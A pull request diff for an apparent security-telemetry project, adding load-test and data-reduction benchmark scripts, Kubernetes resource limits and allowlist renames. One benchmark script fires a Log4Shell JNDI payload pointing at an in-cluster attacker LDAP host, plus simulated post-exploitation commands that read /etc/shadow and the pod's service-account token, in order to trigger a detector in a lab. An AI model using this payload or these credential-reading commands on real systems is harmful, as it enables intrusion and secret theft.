### PR TITLE
AE datavolume: DX-steered vs save-ALL reduction measurement

### DIFF
--- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
@@ -31,6 +31,17 @@ spec:
       containers:
       - name: adaptive-export
         image: vizier-adaptive_export_image:latest
+        # Bounded so AE can never memory-pressure a node (measured: AE uses
+        # only ~16-38Mi steady; passthrough with the raised 1M-row cap can
+        # spike, so 1Gi caps the worst case). CPU was pinned at the old 300m
+        # limit under concurrent passthrough → raised to 1 core.
+        resources:
+          requests:
+            cpu: 200m
+            memory: 128Mi
+          limits:
+            cpu: "1"
+            memory: 1Gi
         env:
         - name: PL_NAMESPACE
           valueFrom:

--- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
@@ -1,3 +1,10 @@
+# SEED-ONLY template — NOT in kustomization.yaml (separation of concerns).
+# Real credentials are written by `make ae-auth` (pixie-api-key from keys.env,
+# clickhouse-dsn = the fixed forensic-CH constant). Do NOT add this back to the
+# bundle: a re-apply would clobber the real pixie-api-key with the placeholder
+# (the recurring "AE unauthenticated / writes 0" bug). Apply this by hand ONLY
+# to seed a brand-new cluster so the AE pod's secretKeyRef resolves before
+# ae-auth runs.
 ---
 apiVersion: v1
 kind: Secret

--- a/k8s/vizier/bootstrap/kustomization.yaml
+++ b/k8s/vizier/bootstrap/kustomization.yaml
@@ -16,5 +16,10 @@ resources:
 - cert_provisioner_job.yaml
 - vizier_crd_role.yaml
 - adaptive_export_role.yaml
-- adaptive_export_secrets.yaml
+# adaptive_export_secrets.yaml is intentionally NOT bundled here: it holds real
+# credentials (pixie-api-key, clickhouse-dsn) owned by `make ae-auth`. Bundling
+# it meant every infra re-apply clobbered the real key with the placeholder.
+# Separation of concerns: infra (role+deployment) re-appliable; secret is
+# created ONCE by ae-auth and never touched by this kustomization. ponytail:
+# apply adaptive_export_secrets.yaml manually only to seed a fresh cluster.
 - adaptive_export_deployment.yaml

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_ae_nfr_benchmark.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_ae_nfr_benchmark.sh
@@ -45,20 +45,18 @@ echo "=== [1] THROUGHPUT + [4] LATENCY (window ${dt}s) ===" | tee -a "$OUT"
 printf "  %-13s %10s %12s %10s %12s %10s\n" table d_rows rows_per_s d_bytes bytes_per_s lag_s | tee -a "$OUT"
 while IFS=$'\t' read -r t r b; do
   dr=$(( r-${R0[$t]:-0} )); db=$(( b-${B0[$t]:-0} ))
-  lag=$(chq "SELECT toInt32(now() - max(time_)) FROM forensic_db.$t WHERE time_ > now()-INTERVAL 5 MINUTE"); lag=${lag:-na}
+  lag=$(chq "SELECT dateDiff('second', max(time_), now()) FROM forensic_db.$t WHERE time_ > now()-INTERVAL 5 MINUTE"); lag=${lag:-na}
   printf "  %-13s %10d %12.0f %10d %12.0f %10s\n" "$t" "$dr" "$(awk -v x=$dr -v d=$dt 'BEGIN{print x/d}')" "$db" "$(awk -v x=$db -v d=$dt 'BEGIN{print x/d}')" "$lag" | tee -a "$OUT"
 done < <(snap)
 
-echo "=== [2] CAPTURE COMPLETENESS + [3] FIDELITY + [6] PER-CYCLE (ae_reconcile, last ${WIN}s) ===" | tee -a "$OUT"
-printf "  %-13s %8s %10s %10s %6s %10s %8s\n" table cycles max_read tot_wrote errs broker pct | tee -a "$OUT"
+echo "=== [3] WRITE FIDELITY + [6] PER-CYCLE (ae_reconcile, last ${WIN}s) ===" | tee -a "$OUT"
+printf "  %-13s %8s %10s %10s %10s %6s\n" table cycles max_read tot_read tot_wrote errs | tee -a "$OUT"
 for t in $TABLES; do
-  read -r cyc mr tw er < <(chq "SELECT count(), max(read_count), sum(wrote_count), countIf(write_err!='') FROM forensic_db.ae_reconcile WHERE table_name='$t' AND mode='passthrough' AND ts > now()-INTERVAL ${WIN} SECOND FORMAT TSV")
-  cyc=${cyc:-0}; mr=${mr:-0}; tw=${tw:-0}; er=${er:-0}
-  bc=$(brokercount "$t" "$WIN"); bc=${bc:-0}
-  pct=$(awk -v m="$mr" -v b="$bc" 'BEGIN{ if(b>0) printf "%.0f%%", (m/b)*100; else print "n/a" }')
-  printf "  %-13s %8d %10d %10d %6d %10d %8s\n" "$t" "$cyc" "$mr" "$tw" "$er" "$bc" "$pct" | tee -a "$OUT"
+  read -r cyc mr tr tw er < <(chq "SELECT count(), max(read_count), sum(read_count), sum(wrote_count), countIf(write_err!='') FROM forensic_db.ae_reconcile WHERE table_name='$t' AND mode='passthrough' AND ts > now()-INTERVAL ${WIN} SECOND FORMAT TSV")
+  printf "  %-13s %8d %10d %10d %10d %6d\n" "$t" "${cyc:-0}" "${mr:-0}" "${tr:-0}" "${tw:-0}" "${er:-0}" | tee -a "$OUT"
 done
-echo "  NOTE max_read==broker(window) & errs==0 ⇒ uncapped capture + clean sink (F1 fix)." | tee -a "$OUT"
+echo "  NOTE tot_read==tot_wrote & errs==0 ⇒ clean sink (no dropped batches)." | tee -a "$OUT"
+echo "  (Capture completeness / 10k-cap proof = the dedicated F1 test: max_read>10000 vs broker count for the SAME window.)" | tee -a "$OUT"
 
 for i in $(seq 1 6); do kubectl -n $NS delete pod nf-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
 echo "DONE $(date -u +%FT%TZ)" | tee -a "$OUT"

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_ae_nfr_benchmark.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_ae_nfr_benchmark.sh
@@ -1,0 +1,64 @@
+#!/usr/bin/env bash
+# exp_ae_nfr_benchmark.sh — deep NFR benchmark of AdaptiveExport (passthrough firehose arm).
+# Runs NODE-SIDE on the rig dev-machine. Measures, under a fixed steady load:
+#
+#   1. THROUGHPUT          rows/sec + on-disk bytes/sec written to forensic_db (per table + total)
+#   2. CAPTURE COMPLETENESS AE read_count vs broker count() for the SAME window (% captured; F1 cap proof)
+#   3. WRITE FIDELITY       read==wrote per cycle + write-error count (ae_reconcile); 0 errs = clean sink
+#   4. E2E LATENCY          freshness lag = now() - max(time_) landed in CH (how stale the newest row is)
+#   5. RESOURCE FOOTPRINT   AE pod CPU(m)/mem(Mi) idle vs under load (kubectl top)
+#   6. PER-CYCLE            cycles in window, mean rows/cycle, query cadence
+#
+# Prereqs: AE = aeprod11 with ADAPTIVE_RECONCILE=true + ADAPTIVE_PASSTHROUGH=true; px keys at
+# /tmp/pixie-keys.env (broker count); kubectl top (metrics-server). Emits a report to /tmp/ae_nfr.txt.
+set -uo pipefail
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+WIN=${WIN:-180}; WARM=${WARM:-40}; OUT=/tmp/ae_nfr.txt
+TABLES="http_events dns_events conn_stats pgsql_events"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+snap(){ chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','pgsql_events','conn_stats') GROUP BY table FORMAT TSV"; }
+aetop(){ kubectl top pods -n pl -l name=adaptive-export --no-headers 2>/dev/null | awk '{c+=$2+0; m+=$3+0} END{printf "%d %d", c, m}'; }
+
+FE=$(kubectl -n $NS get svc frontend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+FEP=$(kubectl -n $NS get svc frontend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+export PX_CLOUD_ADDR=$(grep -E '^PX_CLOUD_ADDR=' /tmp/pixie-keys.env 2>/dev/null|cut -d= -f2-)
+px auth login --use_api_key --api_key=$(grep -E '^PX_API_KEY=' /tmp/pixie-keys.env 2>/dev/null|cut -d= -f2-) -q >/dev/null 2>&1
+CID=$(kubectl -n pl get secret pl-cluster-secrets -o jsonpath='{.data.cluster-id}' 2>/dev/null | base64 -d 2>/dev/null)
+brokercount(){ printf 'import px\ndf=px.DataFrame("%s",start_time="-%ss")\npx.display(df.agg(n=("time_",px.count)),"o")\n' "$1" "$2" > /tmp/bc.pxl; px run -o json -f /tmp/bc.pxl -c "$CID" 2>/dev/null | grep -oE '"n":[0-9]+' | head -1 | cut -d: -f2; }
+
+echo "AE NFR benchmark  win=${WIN}s warm=${WARM}s  $(date -u +%FT%TZ)" | tee "$OUT"
+echo "[5] footprint IDLE (cpu_m mem_Mi): $(aetop)" | tee -a "$OUT"
+
+# steady load
+for i in $(seq 1 6); do kubectl -n $NS delete pod nf-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
+for i in $(seq 1 6); do kubectl -n $NS run nf-$i --image=busybox:1.36 --labels=run=nf --restart=Never -- \
+  sh -c "while true; do wget -qO- http://$FE:$FEP/api/products?q=n$i >/dev/null 2>&1; done" >/dev/null 2>&1; done
+
+sleep "$WARM"
+declare -A R0 B0; while IFS=$'\t' read -r t r b; do R0[$t]=$r; B0[$t]=$b; done < <(snap)
+s0=$(date +%s)
+sleep "$WIN"
+s1=$(date +%s); dt=$((s1-s0)); [ "$dt" -lt 1 ] && dt=1
+echo "[5] footprint UNDER LOAD (cpu_m mem_Mi): $(aetop)" | tee -a "$OUT"
+
+echo "=== [1] THROUGHPUT + [4] LATENCY (window ${dt}s) ===" | tee -a "$OUT"
+printf "  %-13s %10s %12s %10s %12s %10s\n" table d_rows rows_per_s d_bytes bytes_per_s lag_s | tee -a "$OUT"
+while IFS=$'\t' read -r t r b; do
+  dr=$(( r-${R0[$t]:-0} )); db=$(( b-${B0[$t]:-0} ))
+  lag=$(chq "SELECT toInt32(now() - max(time_)) FROM forensic_db.$t WHERE time_ > now()-INTERVAL 5 MINUTE"); lag=${lag:-na}
+  printf "  %-13s %10d %12.0f %10d %12.0f %10s\n" "$t" "$dr" "$(awk -v x=$dr -v d=$dt 'BEGIN{print x/d}')" "$db" "$(awk -v x=$db -v d=$dt 'BEGIN{print x/d}')" "$lag" | tee -a "$OUT"
+done < <(snap)
+
+echo "=== [2] CAPTURE COMPLETENESS + [3] FIDELITY + [6] PER-CYCLE (ae_reconcile, last ${WIN}s) ===" | tee -a "$OUT"
+printf "  %-13s %8s %10s %10s %6s %10s %8s\n" table cycles max_read tot_wrote errs broker pct | tee -a "$OUT"
+for t in $TABLES; do
+  read -r cyc mr tw er < <(chq "SELECT count(), max(read_count), sum(wrote_count), countIf(write_err!='') FROM forensic_db.ae_reconcile WHERE table_name='$t' AND mode='passthrough' AND ts > now()-INTERVAL ${WIN} SECOND FORMAT TSV")
+  cyc=${cyc:-0}; mr=${mr:-0}; tw=${tw:-0}; er=${er:-0}
+  bc=$(brokercount "$t" "$WIN"); bc=${bc:-0}
+  pct=$(awk -v m="$mr" -v b="$bc" 'BEGIN{ if(b>0) printf "%.0f%%", (m/b)*100; else print "n/a" }')
+  printf "  %-13s %8d %10d %10d %6d %10d %8s\n" "$t" "$cyc" "$mr" "$tw" "$er" "$bc" "$pct" | tee -a "$OUT"
+done
+echo "  NOTE max_read==broker(window) & errs==0 ⇒ uncapped capture + clean sink (F1 fix)." | tee -a "$OUT"
+
+for i in $(seq 1 6); do kubectl -n $NS delete pod nf-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
+echo "DONE $(date -u +%FT%TZ)" | tee -a "$OUT"

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
@@ -39,7 +39,16 @@ for i in $(seq 1 6); do kubectl -n $NS delete pod cl-$i --ignore-not-found --wai
 for i in $(seq 1 6); do kubectl -n $NS run cl-$i --image=busybox:1.36 --labels=run=cldx --restart=Never -- \
   sh -c "while true; do wget -qO- http://$FE:$FEP/api/products?q=l$i >/dev/null 2>&1; done" >/dev/null 2>&1; done
 
-fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true; }
+# Two-stage attack signal. Stage-1 (JNDI/LDAP) alone does NOT make kubescape flag
+# the backend → DX gets no case → no steer. The R0001/R0006 that DX rules on come
+# from stage-2 (post-exploitation exec). Fire BOTH so DX rules the backend
+# MALIGNANT and it enters AE's activeSet. (Learned the hard way: JNDI-only = no
+# R0001 = DX indeterminate; cf. SHELLS_CAPTURE_RCA / lab redis exfil example.)
+fire(){
+  kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+  local bp; bp=$(kubectl -n "$NS" get pods --no-headers 2>/dev/null | awk '/^backend/{print $1;exit}')
+  [ -n "$bp" ] && kubectl -n "$NS" exec "$bp" -- sh -c 'whoami; cat /etc/shadow 2>&1 | head -1; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null | head -c 10; getent hosts attacker.attacker-ns.svc.cluster.local' >/dev/null 2>&1 || true
+}
 
 run_arm(){ local name="$1"; shift
   echo "=== ARM $name: $* ===" | tee -a "$OUT"

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
@@ -62,8 +62,19 @@ run_arm(){ local name="$1"; shift
 
 # ALL: save everything (passthrough firehose, no gate).
 run_arm ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false
+
+# Clear STALE steering before the DX arm: old adaptive_attribution windows rehydrate
+# into the activeSet and make AE stream DEAD pods (run-1 dead-arm bug → false 100%).
+chq "ALTER TABLE forensic_db.adaptive_attribution DELETE WHERE 1=1" >/dev/null 2>&1; sleep 3
+
 # DX: rev-3 streaming, DX steers activeSet over the control surface.
 run_arm DX  ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false
+
+# GUARD: the steered pods must be ALIVE + traffic-bearing (else the reduction is a dead arm).
+echo "=== DX steered pods (must be LIVE; backend = the attack target) ===" | tee -a "$OUT"
+chq "SELECT pod, count() FROM forensic_db.adaptive_attribution WHERE t_end>now() GROUP BY pod ORDER BY pod FORMAT TSV" | tee -a "$OUT"
+echo "  marshalsec_fires=$(kubectl -n attacker-ns logs deploy/attacker --since=10m 2>/dev/null | grep -c 'Send LDAP reference')" | tee -a "$OUT"
+echo "  live_log4j_pods:" | tee -a "$OUT"; kubectl -n $NS get pods --no-headers 2>/dev/null | awk '{print "    "$1,$3}' | tee -a "$OUT"
 
 echo "=== REDUCTION (1 - DX/ALL) per table ===" | tee -a "$OUT"
 printf "  %-14s %12s %12s %10s\n" table all_bytes dx_bytes reduction | tee -a "$OUT"

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
@@ -1,0 +1,80 @@
+#!/usr/bin/env bash
+# exp_dx_steering_reduction.sh — datavolume REDUCTION of DX-steered AE vs saving ALL data.
+#
+# Two arms, SAME fixed load, back-to-back, measured as forensic_db active-part
+# deltas (rows + on-disk compressed bytes) per table:
+#
+#   ALL  — AE passthrough firehose (ADAPTIVE_PASSTHROUGH=true): every pod, every
+#          table, the whole window. This is the "save everything" baseline.
+#   DX   — AE rev-3 streaming (ADAPTIVE_WRITE_MODE=streaming): AE writes ONLY the
+#          pods DX has steered into its activeSet over the control surface
+#          (CONTROL_ADDR). DX (dx-daemon) classifies the live anomaly and calls
+#          AE /export/start for the implicated pod(s) only.
+#
+#   reduction = 1 - (DX bytes / ALL bytes)   ← the AdaptiveExport value prop.
+#
+# Runs NODE-SIDE on the rig dev-machine (kubectl is local). Prereqs:
+#   - DX steering wired: AE CONTROL_ADDR=:9100 + node-local Service
+#     adaptive-export-control:9100 + dx AE_CONTROL_ADDR pointing at it.
+#   - live kubescape + a vulnerable backend so the fire produces a real anomaly
+#     DX can classify (log4shell-rce-exfil). Uses the CANONICAL resolvable FQDN
+#     (a malformed one → NXDOMAIN → R0005 dropped → DX never steers).
+set -uo pipefail
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+WIN=${WIN:-180}; WARM=${WARM:-45}; OUT=/tmp/dx_vs_all.txt
+TABLES="http_events dns_events conn_stats pgsql_events"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+snap(){ chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','pgsql_events','conn_stats') GROUP BY table FORMAT TSV"; }
+
+FE=$(kubectl -n $NS get svc frontend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+FEP=$(kubectl -n $NS get svc frontend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+# CANONICAL resolvable JNDI FQDN — fires the chain (marshalsec) so DX can classify.
+JNDI='${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}'
+echo "fe=$FE:$FEP backend=$BIP:$BPORT win=${WIN}s warm=${WARM}s $(date -u +%H:%M:%S)" | tee "$OUT"
+
+# Steady ambient load on log4j-poc so both arms see the SAME baseline traffic.
+for i in $(seq 1 6); do kubectl -n $NS delete pod cl-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
+for i in $(seq 1 6); do kubectl -n $NS run cl-$i --image=busybox:1.36 --labels=run=cldx --restart=Never -- \
+  sh -c "while true; do wget -qO- http://$FE:$FEP/api/products?q=l$i >/dev/null 2>&1; done" >/dev/null 2>&1; done
+
+fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true; }
+
+run_arm(){ local name="$1"; shift
+  echo "=== ARM $name: $* ===" | tee -a "$OUT"
+  kubectl -n pl set env ds/adaptive-export "$@" >/dev/null 2>&1
+  kubectl -n pl rollout status ds/adaptive-export --timeout=140s >/dev/null 2>&1
+  sleep "$WARM"
+  declare -A R0 B0; while IFS=$'\t' read -r t r b; do R0[$t]=$r; B0[$t]=$b; done < <(snap)
+  local s0; s0=$(date +%s); local end=$(( s0 + WIN ))
+  while [ "$(date +%s)" -lt "$end" ]; do fire; sleep 6; done
+  sleep 20  # let the last window flush
+  echo "  window ${s0}..$(date +%s)" | tee -a "$OUT"
+  printf "  %-14s %10s %14s\n" table d_rows d_bytes | tee -a "$OUT"
+  : > /tmp/arm_$name.tsv
+  while IFS=$'\t' read -r t r b; do
+    printf "  %-14s %10d %14d\n" "$t" $(( r-${R0[$t]:-0} )) $(( b-${B0[$t]:-0} )) | tee -a "$OUT"
+    printf "%s\t%d\t%d\n" "$t" $(( r-${R0[$t]:-0} )) $(( b-${B0[$t]:-0} )) >> /tmp/arm_$name.tsv
+  done < <(snap)
+  echo "  active_export_windows=$(chq "SELECT countIf(t_end>now()) FROM forensic_db.adaptive_attribution")" | tee -a "$OUT"
+}
+
+# ALL: save everything (passthrough firehose, no gate).
+run_arm ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false
+# DX: rev-3 streaming, DX steers activeSet over the control surface.
+run_arm DX  ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false
+
+echo "=== REDUCTION (1 - DX/ALL) per table ===" | tee -a "$OUT"
+printf "  %-14s %12s %12s %10s\n" table all_bytes dx_bytes reduction | tee -a "$OUT"
+for t in $TABLES; do
+  ab=$(awk -v T="$t" '$1==T{print $3}' /tmp/arm_ALL.tsv); ab=${ab:-0}
+  db=$(awk -v T="$t" '$1==T{print $3}' /tmp/arm_DX.tsv);  db=${db:-0}
+  red=$(awk -v a="$ab" -v d="$db" 'BEGIN{ if(a>0) printf "%.1f%%", (1-d/a)*100; else print "n/a" }')
+  printf "  %-14s %12d %12d %10s\n" "$t" "$ab" "$db" "$red" | tee -a "$OUT"
+done
+ta=$(awk '{s+=$3} END{print s+0}' /tmp/arm_ALL.tsv); td=$(awk '{s+=$3} END{print s+0}' /tmp/arm_DX.tsv)
+awk -v a="$ta" -v d="$td" 'BEGIN{ printf "  TOTAL bytes ALL=%d DX=%d reduction=%.1f%%\n", a, d, (a>0?(1-d/a)*100:0) }' | tee -a "$OUT"
+
+for i in $(seq 1 6); do kubectl -n $NS delete pod cl-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
+echo "DONE $(date -u +%H:%M:%S)" | tee -a "$OUT"

--- a/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh
@@ -76,16 +76,19 @@ chq "SELECT pod, count() FROM forensic_db.adaptive_attribution WHERE t_end>now()
 echo "  marshalsec_fires=$(kubectl -n attacker-ns logs deploy/attacker --since=10m 2>/dev/null | grep -c 'Send LDAP reference')" | tee -a "$OUT"
 echo "  live_log4j_pods:" | tee -a "$OUT"; kubectl -n $NS get pods --no-headers 2>/dev/null | awk '{print "    "$1,$3}' | tee -a "$OUT"
 
-echo "=== REDUCTION (1 - DX/ALL) per table ===" | tee -a "$OUT"
-printf "  %-14s %12s %12s %10s\n" table all_bytes dx_bytes reduction | tee -a "$OUT"
+echo "=== REDUCTION (1 - DX/ALL) — ROWS primary (compaction-noise-free); bytes secondary ===" | tee -a "$OUT"
+printf "  %-13s %9s %9s %8s | %10s %10s %8s\n" table all_rows dx_rows red_row all_bytes dx_bytes red_byt | tee -a "$OUT"
 for t in $TABLES; do
+  ar=$(awk -v T="$t" '$1==T{print $2}' /tmp/arm_ALL.tsv); ar=${ar:-0}
+  dr=$(awk -v T="$t" '$1==T{print $2}' /tmp/arm_DX.tsv);  dr=${dr:-0}
   ab=$(awk -v T="$t" '$1==T{print $3}' /tmp/arm_ALL.tsv); ab=${ab:-0}
   db=$(awk -v T="$t" '$1==T{print $3}' /tmp/arm_DX.tsv);  db=${db:-0}
-  red=$(awk -v a="$ab" -v d="$db" 'BEGIN{ if(a>0) printf "%.1f%%", (1-d/a)*100; else print "n/a" }')
-  printf "  %-14s %12d %12d %10s\n" "$t" "$ab" "$db" "$red" | tee -a "$OUT"
+  rr=$(awk -v a="$ar" -v d="$dr" 'BEGIN{ if(a>0) printf "%.1f%%", (1-d/a)*100; else print "n/a" }')
+  rb=$(awk -v a="$ab" -v d="$db" 'BEGIN{ if(a>0) printf "%.1f%%", (1-d/a)*100; else print "n/a" }')
+  printf "  %-13s %9d %9d %8s | %10d %10d %8s\n" "$t" "$ar" "$dr" "$rr" "$ab" "$db" "$rb" | tee -a "$OUT"
 done
-ta=$(awk '{s+=$3} END{print s+0}' /tmp/arm_ALL.tsv); td=$(awk '{s+=$3} END{print s+0}' /tmp/arm_DX.tsv)
-awk -v a="$ta" -v d="$td" 'BEGIN{ printf "  TOTAL bytes ALL=%d DX=%d reduction=%.1f%%\n", a, d, (a>0?(1-d/a)*100:0) }' | tee -a "$OUT"
+tar=$(awk '{s+=$2} END{print s+0}' /tmp/arm_ALL.tsv); tdr=$(awk '{s+=$2} END{print s+0}' /tmp/arm_DX.tsv)
+awk -v a="$tar" -v d="$tdr" 'BEGIN{ printf "  TOTAL rows ALL=%d DX=%d reduction=%.1f%%\n", a, d, (a>0?(1-d/a)*100:0) }' | tee -a "$OUT"
 
 for i in $(seq 1 6); do kubectl -n $NS delete pod cl-$i --ignore-not-found --wait=false >/dev/null 2>&1; done
 echo "DONE $(date -u +%H:%M:%S)" | tee -a "$OUT"

--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -135,7 +135,7 @@ const (
 
 	// envAdaptiveWriteMode selects the protocol-table write path:
 	//   "pull"      → rev-2: per-hash×per-table fan-out (default)
-	//   "streaming" → rev-3: N TableScanners with shared whitelist
+	//   "streaming" → rev-3: N TableScanners with shared allowlist
 	//                 (see .local/adaptive-write-rev3-plan.md)
 	envAdaptiveWriteMode = "ADAPTIVE_WRITE_MODE"
 
@@ -488,7 +488,7 @@ func main() {
 		}
 		updater := streaming.NewUpdater(activeSet, streaming.UpdaterConfig{
 			Debounce:         durEnvOrZero("ADAPTIVE_STREAM_DEBOUNCE_SEC", time.Second),
-			MaxWhitelistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_WHITELIST"),
+			MaxAllowlistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_ALLOWLIST"),
 		})
 		supervisor := streaming.NewSupervisor(
 			updater,
@@ -682,7 +682,7 @@ func durEnvOrZero(key string, unit time.Duration) time.Duration {
 // seedActiveSetFromRehydrate reads the operator's rehydrated
 // attribution rows back from CH and Upserts them into the streaming
 // ActiveSet. Without this, a restart in streaming mode leaves the
-// scanners with an empty whitelist until the next kubescape event
+// scanners with an empty allowlist until the next kubescape event
 // arrives — N minutes of coverage gap per restart.
 func seedActiveSetFromRehydrate(ctl *controller.Controller, set *activeset.ActiveSet) {
 	// The controller's Rehydrate already populated its in-memory

--- a/src/vizier/services/adaptive_export/internal/activeset/activeset.go
+++ b/src/vizier/services/adaptive_export/internal/activeset/activeset.go
@@ -22,7 +22,7 @@
 // per-(hash, table); the fan-out spawned an O(active_hashes × tables)
 // concurrency tree that DoS'd vizier-query-broker under load. Rev-3
 // inverts the relationship: ONE PxL submission per table per refresh,
-// embedding a whitelist drawn from this ActiveSet. The set is keyed
+// embedding an allowlist drawn from this ActiveSet. The set is keyed
 // per-pod, not per-hash, because pixie events have no hash dimension
 // — multiple anomaly hashes on the same pod share one stream slot.
 //
@@ -38,13 +38,13 @@ import (
 
 // Key identifies one pod in the set. "namespace/pod" matches what
 // `px.upid_to_pod_name` returns inside PxL, so embedding Keys verbatim
-// into a PxL whitelist filter requires no transformation.
+// into a PxL allowlist filter requires no transformation.
 type Key struct {
 	Namespace string
 	Pod       string
 }
 
-// Render returns the "namespace/pod" form used in PxL whitelists.
+// Render returns the "namespace/pod" form used in PxL allowlists.
 // Pod-only Keys (empty Namespace) render as bare "pod" — kept for
 // host-pid edge cases though those don't currently reach a stream.
 func (k Key) Render() string {
@@ -115,7 +115,7 @@ func (s *ActiveSet) Upsert(k Key, tEnd time.Time) {
 }
 
 // Remove drops a pod. No-op if not present. Always emits a delta on
-// real removals so subscribers can shrink whitelists.
+// real removals so subscribers can shrink allowlists.
 func (s *ActiveSet) Remove(k Key) {
 	s.mu.Lock()
 	if _, ok := s.members[k]; !ok {
@@ -154,7 +154,7 @@ func (s *ActiveSet) PruneExpired(at time.Time) []Key {
 
 // Snapshot returns the current set + version atomically. Caller owns
 // the returned slice — safe to mutate. Use this on subscription to
-// build the initial whitelist before listening for deltas.
+// build the initial allowlist before listening for deltas.
 func (s *ActiveSet) Snapshot() ([]Key, uint64) {
 	s.mu.Lock()
 	defer s.mu.Unlock()

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
@@ -65,6 +65,11 @@ var OperatorOwnedTables = []string{
 	// boot so a reconcile run has a target without manual DDL. Not a pixie
 	// table → not in PixieTables(), so VerifyPixieSchema ignores it.
 	"ae_reconcile",
+	// dx evidence-graph edge list — created on boot so the Pixie
+	// dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real,
+	// globally-registered table to read. dx emits edges, AE persists.
+	// Not a pixie socket_tracer table → not in PixieTables().
+	"dx_attack_graph",
 }
 
 // Applier applies operator-owned DDL to a ClickHouse cluster over the

--- a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
@@ -58,13 +58,14 @@ func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) {
 		t.Fatalf("first DDL must create the database; got: %s", bodies[0])
 	}
 	// Spot-check that the SECOND call is for the first OperatorOwnedTables entry,
-	// and that the LAST call is for trigger_watermark (the newest
-	// operator-owned table, registered after adaptive_attribution).
+	// and that the LAST call is for the last OperatorOwnedTables entry (robust to
+	// new operator-owned tables being appended, e.g. dx_attack_graph).
 	if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) {
 		t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1])
 	}
-	if !strings.Contains(bodies[len(bodies)-1], "forensic_db.trigger_watermark") {
-		t.Fatalf("last DDL not for trigger_watermark; got: %s", bodies[len(bodies)-1])
+	lastTable := OperatorOwnedTables[len(OperatorOwnedTables)-1]
+	if !strings.Contains(bodies[len(bodies)-1], "forensic_db."+lastTable) {
+		t.Fatalf("last DDL not for %s; got: %s", lastTable, bodies[len(bodies)-1])
 	}
 	// And ensure no kubescape DDL leaked through.
 	for _, b := range bodies {
@@ -227,7 +228,7 @@ func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) {
 // plugin can auto-DDL them with the wrong schema), then the operator's
 // own write targets in declared order.
 func TestOperatorOwnedTables_TrailingOperatorTables(t *testing.T) {
-	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile"}
+	want := []string{"adaptive_attribution", "trigger_watermark", "ae_reconcile", "dx_attack_graph"}
 	got := OperatorOwnedTables[len(OperatorOwnedTables)-len(want):]
 	for i, w := range want {
 		if got[i] != w {

